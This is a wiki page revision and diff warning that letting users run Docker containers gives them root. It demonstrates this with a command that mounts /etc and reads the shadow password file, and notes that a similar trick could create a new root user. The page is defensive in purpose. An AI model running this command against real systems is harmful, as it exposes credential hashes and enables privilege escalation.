Docker security: Difference between revisions
Jump to navigation
Jump to search
(Security issues using docker in a multiuser environment.) |
No edit summary |
||
| Line 9: | Line 9: | ||
daemon:*:18358:0:99999:7::: | daemon:*:18358:0:99999:7::: | ||
</pre> | </pre> | ||
This should NEVER be possible for a user to access private files, a simpilar proces could be used to create a new root user, with a known password, thus elevating a user to root user. | |||
Thus you must remember that any memer of the "docker" group, is per defintiion now root on your system. | |||
Revision as of 10:50, 4 January 2023
Docker is actually a major security risk on a system where you allow users to start and stop docker containers. A docker container per default uses root as the running user, and thus starting a docker container using some trickeries as a normal user, will compromise system security..
For instance if I wish to compromise system passwords, I can simply do
mike@Server.ttsh.dk:~/docker$ docker run --rm -v /etc:/mnt/etc/ httpd:2.4 cat /mnt/etc/shadow root:(obfuscated by author)::0:99999:7::: bin:*:18358:0:99999:7::: daemon:*:18358:0:99999:7:::
This should NEVER be possible for a user to access private files, a simpilar proces could be used to create a new root user, with a known password, thus elevating a user to root user.
Thus you must remember that any memer of the "docker" group, is per defintiion now root on your system.